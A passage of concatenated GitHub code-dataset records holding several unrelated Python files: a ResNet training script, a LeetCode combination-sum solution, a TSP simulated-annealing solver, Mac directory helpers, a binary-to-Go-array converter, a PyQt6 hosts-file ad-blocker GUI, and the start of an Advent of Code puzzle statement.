Hyperparameter.INPUT_CHANNEL\nnum_classes = Hyperparameter.NUM_CLASSES\nlr = Hyperparameter.LEARNING_RATE\nnum_epochs = Hyperparameter.NUM_EPOCHS\n\n\ndataset = DataLoader('./dataset/', \n batch_size= batch_size,\n n_classes= num_classes,\n transforms=Hyperparameter.TRAIN_TRANSFORMS)\n\ntorch.manual_seed(Hyperparameter.RANDOM_SEED)\nif torch.cuda.is_available():\n torch.backends.cudnn.deterministic = True\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-net', type=str, required=True, help='net type')\nparser.add_argument('-gpu', type=bool, default=True, help='use gpu or not')\nparser.add_argument('-nc', type=int, default=5, help='number of class')\nparser.add_argument('-sz', type=int, default=3, help='input channel size')\nparser.add_argument('-cs', type=int, default=3, help='input channel size')\nargs = parser.parse_args()\n#net = get_network(args, use_gpu=args.gpu)\nnet = models.resnet50(pretrained=True)\nnum_ftrs = net.fc.in_features\n# Here the size of each output sample is set to 2.\n# Alternatively, it can be generalized to nn.Linear(num_ftrs, len(class_names)).\nnet.fc = nn.Linear(num_ftrs, 
2)\nnet.to(Hyperparameter.device)\n#### DATA PARALLEL START ####\nif torch.cuda.device_count() > 1:\n print(\"Using\", torch.cuda.device_count(), \"GPUs\")\n net = nn.DataParallel(net)\n\n# Create writer to store values \n\nif not os.path.exists(log_path):\n # create the log directory if it does not already exist\n os.mkdir(log_path)\n #os.remove(log_path)\nwriter = SummaryWriter(log_dir=log_path)\n\n\n#class_weights = {(f'{k}',f'{v:.4f}')for k, v in dataset.get_weight().items()}\nclass_weights = dataset.get_weight()\n# config = {'kernel_size' : kernel_size, \n# 'depth_step' : depth_step, \n# 'batch_size' : batch_size, \n# 'Optimizer' : 'Adam', \n# 'lr' : lr}\n\n# json_path = os.path.join(log_path,'config.json')\n# with open(json_path, 'w') as outfile:\n# json.dump(config, outfile)\n\n\nweights = torch.Tensor([class_weights[key] \\\n for key in sorted(class_weights.keys())]).to(Hyperparameter.device)\n# loss_fn = nn.NLLLoss(weights)\nif Hyperparameter.NUM_CLASSES > 1:\n loss_fn = nn.CrossEntropyLoss(weights)\nelse:\n loss_fn = nn.BCEWithLogitsLoss()\n\noptimizer = optim.Adam(net.parameters(),lr = lr)\nscheduler = CosineAnnealingWarmupRestarts(optimizer,\n first_cycle_steps= Hyperparameter.NUM_EPOCHS//2,\n cycle_mult=0.5,\n max_lr= Hyperparameter.LEARNING_RATE,\n min_lr=0.0,\n warmup_steps=1,\n gamma=0.5)\n\ntrain_set= DataLoader('./dataset', batch_size= Hyperparameter.BATCH_SIZE,\n use='train', \n n_classes=Hyperparameter.NUM_CLASSES,\n transforms=Hyperparameter.TRAIN_TRANSFORMS)\nval_set= DataLoader('./dataset', batch_size= Hyperparameter.BATCH_SIZE,\n use='valid',\n n_classes=Hyperparameter.NUM_CLASSES,\n transforms=Hyperparameter.VALID_TRANSFORMS)\ntest_set= DataLoader('./dataset', batch_size= Hyperparameter.BATCH_SIZE,\n use='valid',\n n_classes=Hyperparameter.NUM_CLASSES,\n transforms=Hyperparameter.VALID_TRANSFORMS) \n# Train\ntrainer = Trainer(train_set= train_set, val_set= val_set, test_set= test_set, \n model= net, \n optimizer= optimizer, \n scheduler= scheduler, \n num_classes = num_classes,\n loss_fn= loss_fn, \n accuracy_fn= accuracy_fn, \n patience= Hyperparameter.PATIENCE, \n writer=writer, \n save_path=os.path.join(log_path,'best_model.pt'),\n device= Hyperparameter.device)\n\ntrain_loss, train_acc, train_pre, train_rec, train_f1,\\\n val_loss, val_acc, val_pre, val_rec, val_f1, \\\n best_val_loss = trainer.train_loop(num_epochs=Hyperparameter.NUM_EPOCHS)\n\nplot_loss_graph(train_loss=train_loss, \n train_acc=train_acc, \n train_pre=train_pre,\n train_rec=train_rec,\n train_f1=train_f1,\n val_loss=val_loss, \n val_acc=val_acc,\n val_pre= val_pre,\n val_rec=val_rec,\n val_f1= val_f1,\n save_path=os.path.join(log_path, 'result.png'))\n\nmax_acc = 0\n\n\n# Evaluation\ntest_loss, test_acc, test_pre, test_rec, test_f1, y_preds, y_targets = trainer.test_loop()\nprint(f\"test_loss: {test_loss:.3f}, \\\n test_acc: {test_acc:.3f}, test_pre: {test_pre:.3f},\\\n test_rec: {test_rec:.3f}, test_f1: {test_f1:.3f}\")\n\nwriter.close()\ntorch.save(net.state_dict(), os.path.join(log_path,'last_model.pt'))\n","repo_name":"LEE-SEON-WOO/DL_Trainer","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6342,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"20538762006","text":"# Solution 1: exhaustive backtracking over every possibility; each candidate value has only two choices: take it or skip it\n# recursion stops once taking a number would push the remaining value below 0\nclass Solution:\n def combinationSum(self,candidates: list[int], target: int) -> list[list[int]]:\n # collected results\n result = []\n \n # candidates: the selectable values; curIndex: the index whose choice is currently being decided; 
curCandidates: the combination built so far; target: the target total; result gathers every valid combination\n def combinationSumDFS(candidates: list[int], curIndex: int, curCandidates: list[int], target: int):\n total = sum(curCandidates)\n # stop when the values in curCandidates sum to target, or when curIndex == len(candidates)\n if total == target:\n result.append(curCandidates)\n return\n elif curIndex == len(candidates):\n return\n elif total > target:\n return\n\n # two branches: take candidates[curIndex] again (append it to curCandidates) or move on to index+1\n combinationSumDFS(candidates, curIndex, curCandidates+[candidates[curIndex]], target)\n combinationSumDFS(candidates, curIndex + 1,curCandidates[:], target)\n\n combinationSumDFS(candidates, 0, [], target)\n return result\n","repo_name":"CivilAisys/LeetCode","sub_path":"39.CombinationSum/39_CombinationSum.py","file_name":"39_CombinationSum.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21244900364","text":"import math\nimport glob\nimport random\nimport copy\n\n\ndef read_input_csv(file_name):\n cities = []\n with open(file_name, 'r') as f:\n for i, line in enumerate(f):\n if i == 0:\n continue\n x, y = line.strip().split(',')\n cities.append({'x': float(x), 'y': float(y), 'index': i - 1})\n return cities\n\n\ndef write_output_csv(file_name, cities):\n with open(file_name, 'w') as f:\n f.write('index\\n')\n for city in cities:\n f.write('{}\\n'.format(city['index']))\n\n\ndef calc_distance(city1, city2):\n return math.sqrt((city1['x'] - city2['x']) ** 2 + (city1['y'] - city2['y']) ** 2)\n\n\ndef calc_total_distance(cities):\n total_distance = 0\n for i in range(len(cities)):\n city1 = cities[i]\n city2 = cities[(i + 1) % len(cities)]\n total_distance += calc_distance(city1, city2)\n return total_distance\n\n\ndef main():\n input_files = glob.glob('./google-step-tsp/input_[0-6].csv')\n # input_files = glob.glob('./google-step-tsp/input_3.csv')\n alpha = 0.85\n # input_files = input_files[5:]\n for input_file in input_files:\n cities = read_input_csv(input_file)\n\n best_total_distance = calc_total_distance(cities)\n best_cities = copy.deepcopy(cities)\n cities_count = len(cities)\n\n for _ in range(30):\n # generate an initial solution\n # greedy nearest-neighbour construction\n current_city = random.choice(cities)\n unvisited_cities = copy.deepcopy(cities)\n unvisited_cities.remove(current_city)\n visited_cities = [current_city]\n while len(unvisited_cities) > 0:\n next_city = min(unvisited_cities, key=lambda city: calc_distance(\n current_city, city))\n unvisited_cities.remove(next_city)\n visited_cities.append(next_city)\n current_city = next_city\n\n total_distance = calc_total_distance(visited_cities)\n assert cities_count == len(visited_cities)\n\n for k in range(min(cities_count * 1000, 100000)):\n # randomly pick two cities and swap them -> keep the swap if the score improves, otherwise keep it with some probability (simulated-annealing style)\n i = random.randint(0, cities_count - 1)\n j = random.randint(0, cities_count - 1)\n if i == j:\n continue\n else:\n visited_cities[i], visited_cities[j] = visited_cities[j], visited_cities[i]\n new_total_distance = calc_total_distance(visited_cities)\n if new_total_distance < total_distance:\n total_distance = new_total_distance\n elif random.random() < alpha**((new_total_distance - total_distance)):\n total_distance = new_total_distance\n # print('accept')\n else:\n visited_cities[i], visited_cities[j] = visited_cities[j], visited_cities[i]\n # print('reject')\n \n if k % 10000 == 0:\n print(k, total_distance)\n\n if total_distance < best_total_distance:\n best_total_distance = 
total_distance\n best_cities = copy.deepcopy(visited_cities)\n\n assert cities_count == len(best_cities)\n\n write_output_csv('./google-step-tsp/output_' +\n input_file[len('./google-step-tsp/input_'):], best_cities)\n print(input_file, best_total_distance)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"syobonpastel/step2023_homework","sub_path":"week5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38797766379","text":"\n\"\"\"Utilities for finding standard Mac directories.\n\nHistory:\n2004-02-04 ROwen\n2004-02-12 ROwen Modified to use fsref.as_pathname() instead of Carbon.File.pathname(fsref).\n2005-07-11 ROwen Modified getAppSuppDirs to return None for nonexistent directories.\n Removed doCreate argument from getAppSuppDirs, getDocsDir and getPrefsDir.\n Added getDocsDir.\n2005-09-27 ROwen Changed getPrefsDir to getPrefsDirs.\n Added getAppDirs.\n Refactored to use getMacUserDir and getMacUserSharedDirs.\n2005-10-05 ROwen Added inclNone argument to getXXXDirs functions.\n Modified getStandardDir to return None if dirType is None.\n Added getAppDirs and getPrefsDirs to the test code.\n Removed obsolete getPrefsDir.\n2015-09-24 ROwen Replace \"== None\" with \"is None\" to modernize the code.\n2015-11-03 ROwen Replace \"!= None\" with \"is not None\" to modernize the code.\n2022-11-09 GMacD Now using pyObjC framework with Python 3.x.\n\"\"\"\nfrom Foundation import *\n\n\ndef getAppDirs(inclNone = False):\n \"\"\"Return up to two paths: user's private and shared application directory.\n\n Inputs:\n - inclNone if True, paths to missing folders are set to None;\n if False (the default) paths to missing folders are omitted\n \"\"\"\n userPrivateAppDirs = NSSearchPathForDirectoriesInDomains(\n NSApplicationDirectory,\n NSUserDomainMask,\n True\n )\n userLocalAppDirs = NSSearchPathForDirectoriesInDomains(\n NSApplicationDirectory,\n NSLocalDomainMask,\n True\n )\n return [*userPrivateAppDirs, *userLocalAppDirs]\n\ndef getAppSuppDirs(inclNone = False):\n \"\"\"Return up to two paths: the user's private and shared application support directory.\n \n Inputs:\n - inclNone if True, paths to missing folders are set to None;\n if False (the default) paths to missing folders are omitted\n \"\"\"\n userPrivateSuppDirs = NSSearchPathForDirectoriesInDomains(\n NSApplicationSupportDirectory,\n NSUserDomainMask,\n True\n )\n userLocalSuppDirs = NSSearchPathForDirectoriesInDomains(\n NSApplicationSupportDirectory,\n NSLocalDomainMask,\n True\n )\n return [*userPrivateSuppDirs, *userLocalSuppDirs] \n\ndef getDocsDir():\n \"\"\"Return the path to the user's documents directory.\n \n Return None if the directory does not exist.\n \"\"\"\n userDocumentDir = NSSearchPathForDirectoriesInDomains(\n NSDocumentDirectory,\n NSUserDomainMask,\n True\n )\n return userDocumentDir[-1]\n\ndef getPrefsDirs(inclNone = False):\n \"\"\"Return up to two paths: the user's local and shared preferences directory.\n \n Inputs:\n - inclNone if True, paths to missing folders are set to None;\n if False (the default) paths to missing folders are omitted\n \"\"\"\n userPrivatePrefPanesDir = NSSearchPathForDirectoriesInDomains(\n NSPreferencePanesDirectory,\n NSUserDomainMask,\n True\n )\n userLocalPrefPanesDir = NSSearchPathForDirectoriesInDomains(\n NSPreferencePanesDirectory,\n NSLocalDomainMask,\n True\n )\n return [*userPrivatePrefPanesDir, *userLocalPrefPanesDir]\n\ndef getHomeDir():\n 
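# NSHomeDirectory comes from the pyObjC Foundation bridge imported above\n 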
\"\"\"\n Return user's home directory location.\n \"\"\"\n return NSHomeDirectory()\n\ndef getPrefsPrefix():\n \"\"\"\n Return the preferences prefix for the preferences file,\n and empty string for Maci i.e. no prefix.\n \"\"\"\n return ''\n","repo_name":"ApachePointObservatory/TUI3","sub_path":"RO/OS/getMacDirs.py","file_name":"getMacDirs.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"24864814535","text":"import argparse\nimport sys\n\n# parse args\n########################################\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-w\", \"--width\", type=int, default=120, help=\"sets maximum width in characters of output Go bytes array\")\nparser.add_argument(\"infile\", help=\"file to convert into a Go bytes array\")\nargs = parser.parse_args()\n\n# read file\n########################################\n\nbyte_list = []\n\nwith open(args.infile, \"rb\") as f:\n byte = f.read(1)\n while byte:\n byte_as_int = int.from_bytes(byte, byteorder=sys.byteorder)\n byte_list.append(byte_as_int)\n byte = f.read(1)\n\n# print byte array\n########################################\n\nprint(\"var myBytesArray []byte = []byte{\")\nline = \" {}, \".format(byte_list[0])\n\nfor b in byte_list[1:]:\n\n if len(\"{}{},\".format(line, b)) > args.width:\n print(line)\n line = \" {}, \".format(b)\n else:\n line += \"{}, \".format(b)\n\nprint(line)\nprint(\"}\")\n","repo_name":"davgra04/bin2go","sub_path":"bin2go.py","file_name":"bin2go.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73353003366","text":"'''\r\nCopyright (C) 2021 xploreinfinity\r\n\r\nThis program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, version 3.\r\n\r\nThis program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\r\n\r\nYou should have received a copy of the GNU General Public License along with this program. 
If not, see <https://www.gnu.org/licenses/>.\r\n'''\r\n\r\nfrom PyQt6 import QtWidgets,QtCore,QtGui,uic\r\nimport sys,os,inspect\r\nfrom swift_block import Parser\r\n#from swift_block import elevate\r\nfrom swift_block import RuleManager\r\nclass Ui(QtWidgets.QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n #*load the ui file\r\n self.scriptPath=os.path.abspath(os.path.dirname(inspect.getsourcefile(lambda:0))).replace('\\\\','/')\r\n uic.loadUi(self.scriptPath+\"/ui/adblock.ui\",self)\r\n #*init the library for interacting with host sources,etc...\r\n #!WARNING:This changes the current directory\r\n self.parser=Parser.Parser()\r\n\r\n #*GLOBAL VARIABLES DECLARATION:\r\n self.status=False #*Flag which indicates whether swiftblock is enabled or disabled\r\n self.editMode=True #*controls whether the source editing form is set to edit source mode or add source mode\r\n self.selectedSource=''#*Will store QListWidgetItem that is currently selected by the user\r\n self.sourceDct={}#*Stores source names and corresponding source URLs for display in the source edit form when user clicks on a source\r\n\r\n self.SignalSlotConfig()\r\n self.show()\r\n self.reconf_ui()\r\n\r\n def reconf_ui(self):\r\n self.setWindowIcon(QtGui.QIcon(self.scriptPath+\"/assets/app_icon.svg\"))\r\n #*Reconfig for the status tab:\r\n self.loadStatus()\r\n self.manageRules_btn.setIcon(QtGui.QIcon(self.scriptPath+\"/assets/ruleMan.svg\"))\r\n self.manageRules_btn.setIconSize(QtCore.QSize(30,30))\r\n self.updateSources_btn.setIcon(QtGui.QIcon(self.scriptPath+\"/assets/sources_update.png\"))\r\n self.updateSources_btn.setIconSize(QtCore.QSize(35,35))\r\n #*Reconfig for the sources tab:\r\n self.loadSrcData()\r\n self.sourcesForm_widget.setDisabled(True)\r\n self.sourceDelete_btn.setDisabled(True)\r\n self.editMode_lbl.hide()\r\n self.formStatus_lbl.hide()\r\n self.sourceName_tf.setPlaceholderText(\"Unique nickname for the source\")\r\n self.sourceURL_tf.setPlaceholderText(\"Unique URL of the source\")\r\n #*Reconfig for the about tab:\r\n self.gitRepo_btn.setIcon(QtGui.QIcon(self.scriptPath+'/assets/github.svg'))\r\n self.gitRepo_btn.setIconSize(QtCore.QSize(35,50))\r\n self.license_btn.setIcon(QtGui.QIcon(self.scriptPath+'/assets/license.png'))\r\n self.license_btn.setIconSize(QtCore.QSize(30,30))\r\n self.uninstall_btn.setIcon(QtGui.QIcon(self.scriptPath+'/assets/uninstall.png'))\r\n self.uninstall_btn.setIconSize(QtCore.QSize(30,30))\r\n self.appIcon_lbl.setStyleSheet(\"border-image:url(\"+self.scriptPath+\"/assets/app_icon.svg);\")\r\n\r\n #*Several utility functions that prevent code repetition:\r\n #*Shows an error MessageBox which informs the user of the error(and provides additional info):\r\n def err_msg(self,err):\r\n msg=QtWidgets.QMessageBox()\r\n msg.setWindowTitle(\"Error\")\r\n msg.setIcon(QtWidgets.QMessageBox.Icon.Critical)\r\n msg.setStandardButtons(QtWidgets.QMessageBox.StandardButton.Ok)\r\n msg.setText(\"Oops! An error occurred. Additional info is provided below\")\r\n msg.setDetailedText(str(err))\r\n msg.exec()\r\n\r\n #*Displays a success/error message on the label passed as an argument:\r\n def showStatus_lbl(self,message,lbl,success=False):\r\n if success:\r\n lbl.setStyleSheet(\"color:black;background-color:limegreen;font-weight:bold\")\r\n else:\r\n lbl.setStyleSheet(\"color:white;background-color:crimson;font-weight:bold\")\r\n lbl.setText(message)\r\n lbl.show()\r\n\r\n #*load the status of the adblocker(whether active,no. 
of hosts blocked/redirected/allowed):\r\n def loadStatus(self):\r\n blocked,redirected,allowed,self.status=self.parser.getStatus()\r\n if blocked is not None and redirected is not None and allowed is not None:\r\n self.blockedCount_lbl.setText(str(blocked))\r\n self.redirectedCount_lbl.setText(str(redirected))\r\n self.allowedCount_lbl.setText(str(allowed))\r\n #*Based on swiftblock's status,change the gui accordingly:\r\n if self.status:\r\n self.status_lbl.setText(\"SwiftBlock is enabled\")\r\n self.toggleStatus_btn.setText(\"Disable\")\r\n self.background_lbl.setStyleSheet(\"background-image:url('\"+self.scriptPath+\"/assets/martini.png');\")\r\n self.statusShield_lbl.setStyleSheet(\"border-image:url('\"+self.scriptPath+\"/assets/active_shield.svg');\")\r\n else:\r\n self.status_lbl.setText(\"SwiftBlock is disabled\")\r\n self.toggleStatus_btn.setText(\"Enable\")\r\n self.background_lbl.setStyleSheet(\"background-image:url('\"+self.scriptPath+\"/assets/autumn.png');\")\r\n self.statusShield_lbl.setStyleSheet(\"border-image:url('\"+self.scriptPath+\"/assets/inactive_shield.svg');\")\r\n\r\n\r\n #*fetches and shows user's host sources on the sourcesList:\r\n def loadSrcData(self):\r\n self.sourcesList.clear()\r\n self.selectedSource=None\r\n sources=self.parser.fetch_sources()\r\n self.sourceDct={}\r\n for source in sources:\r\n self.sourcesList.addItem(source[0])\r\n self.sourceDct[source[0]]=source[1]\r\n #*Reset the form and disable said form and the delete btn:\r\n self.sourceName_tf.setText('')\r\n self.sourceURL_tf.setText('')\r\n self.sourcesForm_widget.setDisabled(True)\r\n self.sourceDelete_btn.setDisabled(True)\r\n\r\n #*A vital function that assigns all widgets handlers(slots) for specific events(signals):\r\n def SignalSlotConfig(self):\r\n #*for events occurring in status tab:\r\n self.toggleStatus_btn.clicked.connect(self.toggleStatusClicked)\r\n self.manageRules_btn.clicked.connect(self.openRuleManager)\r\n self.updateSources_btn.clicked.connect(self.updateSourcesClicked)\r\n #*for events occurring in sources tab:\r\n self.sourcesList.selectionModel().currentChanged.connect(self.sourceSelected)\r\n self.sourceAdd_btn.clicked.connect(self.addBtnClicked)\r\n self.sourceDelete_btn.clicked.connect(self.deleteBtnClicked)\r\n self.sourceSave_btn.clicked.connect(self.sourceSaveBtnClicked)\r\n #*for events occurring in the about tab:\r\n self.gitRepo_btn.clicked.connect(self.gitRepo_btnClicked)\r\n self.license_btn.clicked.connect(self.license_btnClicked)\r\n self.uninstall_btn.clicked.connect(self.uninstall_btnClicked)\r\n\r\n #*SLOTS FOR EACH SIGNAL BELOW:\r\n #*slots for status tab:\r\n #*Enables or disables swiftblock:\r\n def toggleStatusClicked(self):\r\n #*If swiftblock is enabled, disable it:\r\n if self.status:\r\n self.status=False\r\n self.parser.write_changes(purge=True)\r\n #*Reload the status to reflect the change in the GUI:\r\n self.loadStatus()\r\n #*If swiftblock is disabled, enable it:\r\n else:\r\n self.status=True\r\n self.parser.write_changes()\r\n #*Reload the status to reflect the change in the GUI:\r\n self.loadStatus()\r\n\r\n #*Opens the rule manager window:\r\n def openRuleManager(self):\r\n self.rm=RuleManager.RuleManager(self.scriptPath)\r\n self.close()\r\n\r\n\r\n #*Updates the sources(fetches them from their origin) and then regenerates hosts file:\r\n def updateSourcesClicked(self):\r\n try:\r\n self.parser.generateSourceRules(updateSources=True)\r\n self.parser.regen_hosts()\r\n self.loadStatus()#*Refresh the blocked/redirected/allowed counts after the update\r\n #*Inform the user that the update succeeded:\r\n 
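#*(msg.exec() opens a modal dialog, mirroring the err_msg helper above)\r\n 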
#*Inform the user that the update succeeded:\r\n msg=QtWidgets.QMessageBox()\r\n msg.setStandardButtons(QtWidgets.QMessageBox.StandardButton.Ok)\r\n msg.setWindowTitle(\"Success\")\r\n msg.setText(\"Sources updated successfully and changes applied!\")\r\n msg.setIcon(QtWidgets.QMessageBox.Icon.Information)\r\n msg.exec()\r\n except Exception as err:\r\n self.err_msg(err)\r\n\r\n #*slots for the sources tab:\r\n def sourceSelected(self,current):\r\n #*Make sure the list isnt empty(which makes selected item None type)\r\n if self.sourcesList.currentItem():\r\n item=self.sourcesList.currentItem().text()\r\n #*update the value of the selectedSource global var:\r\n self.selectedSource=item\r\n self.sourceName_tf.setText(item)\r\n self.sourceURL_tf.setText(self.sourceDct[item])\r\n #*Activate the form and show the user that they're now editing a source:\r\n self.sourcesForm_widget.setDisabled(False)\r\n self.editMode=True\r\n self.editMode_lbl.setText(\"Editing an existing source:\")\r\n self.editMode_lbl.show()\r\n #*also hide previous status messages and enable the delete btn:\r\n self.formStatus_lbl.hide()\r\n self.sourceDelete_btn.setDisabled(False)\r\n\r\n def addBtnClicked(self):\r\n #*Clear(and enable if disabled) the form and change the editMode to add mode:\r\n self.sourcesForm_widget.setDisabled(False)\r\n self.editMode_lbl.show()\r\n self.sourceName_tf.setText('')\r\n self.sourceURL_tf.setText('')\r\n self.editMode=False\r\n self.editMode_lbl.setText(\"Adding a new source:\")\r\n #*Also hide any previous messages:\r\n self.formStatus_lbl.hide()\r\n\r\n def deleteBtnClicked(self):\r\n #*ensure that a source from the list is selected,warn the user otherwise:\r\n if not self.selectedSource:\r\n self.showStatus_lbl(\"Select a source from the list first!\",self.formStatus_lbl)\r\n else:\r\n #*Ask the user if they really want to delete the source\r\n question=QtWidgets.QMessageBox(QtWidgets.QMessageBox.Icon.Question,\"Please Confirm\",\"Are you sure you want to delete this source?\",(QtWidgets.QMessageBox.StandardButton.Yes|QtWidgets.QMessageBox.StandardButton.No))\r\n confirm=question.exec()\r\n if confirm==QtWidgets.QMessageBox.StandardButton.Yes:\r\n self.sourceDelete_btn.setDisabled(True)\r\n try:\r\n self.parser.del_source(self.selectedSource)\r\n self.loadSrcData()\r\n self.showStatus_lbl(\"Deleted source successfully!\",self.formStatus_lbl,True)\r\n except Exception as err:\r\n self.err_msg(err)\r\n self.showStatus_lbl(\"Oops! 
An error occurred\",self.formStatus_lbl)\r\n self.sourceDelete_btn.setDisabled(True)\r\n\r\n def sourceSaveBtnClicked(self):\r\n srcName=self.sourceName_tf.text()\r\n srcURL=self.sourceURL_tf.text()\r\n if(srcName==\"\" or srcURL==\"\"):\r\n self.formStatus_lbl.setStyleSheet(\"color:white;background-color:crimson;font-weight:bold\")\r\n self.formStatus_lbl.setText(\"Fields can't be empty!\")\r\n self.formStatus_lbl.show()\r\n #*ensure that a source from the list is selected,warn the user otherwise:\r\n elif not self.selectedSource and self.editMode:\r\n self.showStatus_lbl(\"Select a source from the list first!\",self.formStatus_lbl)\r\n else:\r\n #*Save button disabled to prevent multiple save attempts at once\r\n self.sourceSave_btn.setDisabled(True)\r\n #*Check the mode[editMode when True is to edit an existing source and to add a new source when False]\r\n if self.editMode:\r\n try:\r\n self.parser.edit_source(self.selectedSource,srcName,self.sourceDct[self.selectedSource],srcURL)\r\n self.loadSrcData()\r\n self.showStatus_lbl(\"Edited source successfully!\",self.formStatus_lbl,True)\r\n except Exception as err:\r\n self.err_msg(err)\r\n self.showStatus_lbl(\"Oops! An error occurred\",self.formStatus_lbl)\r\n #*calling this here incase the editing of the source succeeded but something else failed:(which would effectively make existing sourceList entries old and obsolete)\r\n self.loadSrcData()\r\n\r\n\r\n else:\r\n try:\r\n self.parser.add_source(srcName,srcURL)\r\n self.loadSrcData()\r\n self.showStatus_lbl(\"Added source successfully!\",self.formStatus_lbl,True)\r\n except Exception as err:\r\n self.err_msg(err)\r\n self.showStatus_lbl(\"Oops! An error occurred\",self.formStatus_lbl)\r\n #*calling this here incase the adding of the source succeeded but something else failed:(which would effectively make existing sourceList entries old and obsolete)\r\n self.loadSrcData()\r\n\r\n #*re-enable the save btn\r\n self.sourceSave_btn.setDisabled(False)\r\n\r\n #*Slots for the about tab:\r\n def gitRepo_btnClicked(self):\r\n import webbrowser\r\n if sys.platform.startswith('win32'):\r\n webbrowser.open(\"https://github.com/XploreInfinity/swift-block\")\r\n else:\r\n self.err_msg(\"To see the Git Repo,visit 'https://github.com/XploreInfinity/swift-block' in your web-browser.\\n\\nSince swiftblock runs as root/administrator user,we can't(safely)open it for you\")\r\n\r\n def license_btnClicked(self):\r\n import webbrowser\r\n if sys.platform.startswith('win32'):\r\n webbrowser.open(\"https://github.com/XploreInfinity/swift-block/blob/main/LICENSE\")\r\n else:\r\n self.err_msg(\"To see the license,visit 'https://github.com/XploreInfinity/swift-block/blob/main/LICENSE' in your web-browser.\\n\\nSince swiftblock runs as root/administrator user,we can't(safely)open it for you\")\r\n\r\n def uninstall_btnClicked(self):\r\n #*Ask the user if they really want to uninstall swift-block:\r\n question=QtWidgets.QMessageBox(QtWidgets.QMessageBox.Icon.Question,\"Please Confirm\",\"Swift Block will be removed along with its menu launcher. Are you sure you want to continue?\",(QtWidgets.QMessageBox.StandardButton.Yes|QtWidgets.QMessageBox.StandardButton.No))\r\n confirm=question.exec()\r\n if confirm==QtWidgets.QMessageBox.StandardButton.Yes:\r\n try:\r\n #*Call the uninstaller:\r\n self.parser.uninstall()\r\n except Exception as err:\r\n #*Unfortunately, windows doesnt allow running programs to be deleted. 
So uninstalling swiftblock from within swiftblock will certainly fail\r\n #*Pip will uninstall the package,but some .exe files will persist in the %TEMP% directory. This is a trivial faliure and not worth asking\r\n #*the user to manually uninstall swiftblock from cmd. Exit swiftblock and call it a day:\r\n if sys.platform.startswith('win32'):\r\n print(err)\r\n exit()\r\n self.err_msg(str(err)+'\\nTry uninstalling swift-block using pip from your terminal/cmd')\r\n","repo_name":"XploreInfinity/swift-block","sub_path":"swift_block/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10633541614","text":"'''\n--- Part Two ---\nYou're worried you might not ever get your items back. So worried, in fact, that your relief that a monkey's inspection didn't damage an item no longer causes your worry level to be divided by three.\n\nUnfortunately, that relief was all that was keeping your worry levels from reaching ridiculous levels. You'll need to find another way to keep your worry levels manageable.\n\nAt this rate, you might be putting up with these monkeys for a very long time - possibly 10000 rounds!\n\nWith these new rules, you can still figure out the monkey business after 10000 rounds. Using the same example above:\n\n== After round 1 ==\nMonkey 0 inspected items 2 times.\nMonkey 1 inspected items 4 times.\nMonkey 2 inspected items 3 times.\nMonkey 3 inspected items 6 times.\n\n== After round 20 ==\nMonkey 0 inspected items 99 times.\nMonkey 1 inspected items 97 times.\nMonkey 2 inspected items 8 times.\nMonkey 3 inspected items 103 times.\n\n== After round 1000 ==\nMonkey 0 inspected items 5204 times.\nMonkey 1 inspected items 4792 times.\nMonkey 2 inspected items 199 times.\nMonkey 3 inspected items 5192 times.\n\n== After round 2000 ==\nMonkey 0 inspected items 10419 times.\nMonkey 1 inspected items 9577 times.\nMonkey 2 inspected items 392 times.\nMonkey 3 inspected items 10391 times.\n\n== After round 3000 ==\nMonkey 0 inspected items 15638 times.\nMonkey 1 inspected items 14358 times.\nMonkey 2 inspected items 587 times.\nMonkey 3 inspected items 15593 times.\n\n== After round 4000 ==\nMonkey 0 inspected items 20858 times.\nMonkey 1 inspected items 19138 times.\nMonkey 2 inspected items 780 times.\nMonkey 3 inspected items 20797 times.\n\n== After round 5000 ==\nMonkey 0 inspected items 26075 times.\nMonkey 1 inspected items 23921 times.\nMonkey 2 inspected items 974 times.\nMonkey 3 inspected items 26000 times.\n\n== After round 6000 ==\nMonkey 0 inspected items 31294 times.\nMonkey 1 inspected items 28702 times.\nMonkey 2 inspected items 1165 times.\nMonkey 3 inspected items 31204 times.\n\n== After round 7000 ==\nMonkey 0 inspected items 36508 times.\nMonkey 1 inspected items 33488 times.\nMonkey 2 inspected items 1360 times.\nMonkey 3 inspected items 36400 times.\n\n== After round 8000 ==\nMonkey 0 inspected items 41728 times.\nMonkey 1 inspected items 38268 times.\nMonkey 2 inspected items 1553 times.\nMonkey 3 inspected items 41606 times.\n\n== After round 9000 ==\nMonkey 0 inspected items 46945 times.\nMonkey 1 inspected items 43051 times.\nMonkey 2 inspected items 1746 times.\nMonkey 3 inspected items 46807 times.\n\n== After round 10000 ==\nMonkey 0 inspected items 52166 times.\nMonkey 1 inspected items 47830 times.\nMonkey 2 inspected items 1938 times.\nMonkey 3 inspected items 52013 times.\nAfter 10000 rounds, the two most active monkeys 
